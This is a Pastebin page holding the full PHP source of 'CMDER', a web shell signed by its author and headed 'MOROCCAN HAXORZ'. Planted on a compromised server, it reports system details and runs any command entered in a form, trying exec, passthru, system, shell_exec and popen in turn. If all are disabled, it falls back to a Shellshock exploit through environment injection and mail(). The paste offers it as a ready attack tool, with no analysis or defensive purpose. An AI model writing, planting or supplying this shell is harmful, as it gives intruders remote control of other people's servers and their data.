API tools faq
paste
inj3ctor_m4

CMDER

inj3ctor_m4
Dec 7th, 2014
438
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.68 KB | None | 0 0
raw download clone embed print report
  1. <title>Made In Morocco</title>
  2. <style>
  3. input,select,textarea {
  4.     border:1px solid #4F4F4F; font-family:Verdana; font-size:11px;
  5. }
  6. </style>
  7. <center>
  8. <table border='1' width='%70' cellpadding='5'>
  9. <tr><td align='center'><i><b><font size='2' face='Courier'>#CMDER WEBSHELL</font></b></i></td></tr>
  10. <tr><td align='center'><img src="https://powersthatbeat.files.wordpress.com/2011/05/photo8.jpg"></td></tr>
  11. <?php
  12. #CMDER // BY INJ3CTOR_M4
  13. set_time_limit(0);
  14. error_reporting(0);
  15.  
  16. // FILE MANAGER
  17. if(!empty($_GET['path'])) {
  18.     $cmd = trim($_GET['path']);
  19.     chdir($cmd);
  20. }
  21.  
  22. // CMDER DESGIN
  23. echo'<tr><td align="center"><b><font size="2" face="Courier">UNAME:</b> '.php_uname().'</font></td></tr>';
  24. echo'<tr><td align="center"><b><font size="2" face="Courier">PWD:</b> '.getcwd().'</font><form method="GET">
  25. <input type="text" name="path" value="'.getcwd().'">
  26. <input type="submit" value="CHANGE">
  27. </form><font size="2" face="Courier"><b>DISABLE_FUNCTION:</b> <u>'.@showdisablefunctions().'</u></font></td></tr>';
  28. echo'<tr><td align="center">
  29. <form method="POST">
  30. <font size="2" face="Courier">Command:</font><br />
  31. <input type="text" size="30" name="Command" value="uname -a">
  32. <input type="submit" value="EXEC">
  33. </form>
  34. </td></tr>';
  35. if(!empty($_POST['Command'])) {
  36.     $cmd = trim($_POST['Command']);
  37.     echo'<tr><td align="center">';
  38.     echo'<textarea style="width: 926px; height: 382px;">';
  39.     echo m4Ex($cmd);
  40.     echo'</textarea><br />';
  41. }
  42. echo'<tr><td align="center"><font size="6" color="#051F53">MOROCCAN HAXORZ</font></td></tr>';
  43.  
  44. // FUNCTIONS
  45. function showdisablefunctions() {
  46. if ($disablefunc=@ini_get("disable_functions")){
  47.     return "<font color=red><b>".$disablefunc."</b></font>";
  48. }else{
  49.     return "<font color=green><b>NONE</b></b></font>";
  50. }
  51. }
  52.  
  53. function m4Ex($in) {
  54.     $out = '';
  55.     if (function_exists('exec')) {
  56.         @exec($in,$out);
  57.         $out = @join("\n",$out);
  58.     } elseif (function_exists('passthru')) {
  59.         ob_start();
  60.         @passthru($in);
  61.         $out = ob_get_clean();
  62.     } elseif (function_exists('system')) {
  63.         ob_start();
  64.         @system($in);
  65.         $out = ob_get_clean();
  66.     } elseif (function_exists('shell_exec')) {
  67.         $out = shell_exec($in);
  68.     } elseif (is_resource($f = @popen($in,"r"))) {
  69.         $out = "";
  70.         while(!@feof($f))
  71.             $out .= fread($f,1024);
  72.         pclose($f);
  73.     } else {
  74.         $out = shellshock($in);
  75.     }
  76.     return $out;
  77. }
  78.  
  79. function shellshock($cmd) {
  80.     if(strstr(readlink("/bin/sh"), "bash") != FALSE) {
  81.         $tmp = tempnam(".","data");
  82.         putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
  83.         mail("[email protected]","","","","-bv");
  84.     }
  85.     else return "Not vuln (not bash)";
  86.     $output = @file_get_contents($tmp);
  87.     @unlink($tmp);
  88.     if($output != "") return $output;
  89.     else return "No output, or not vuln.";
  90. }
  91. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!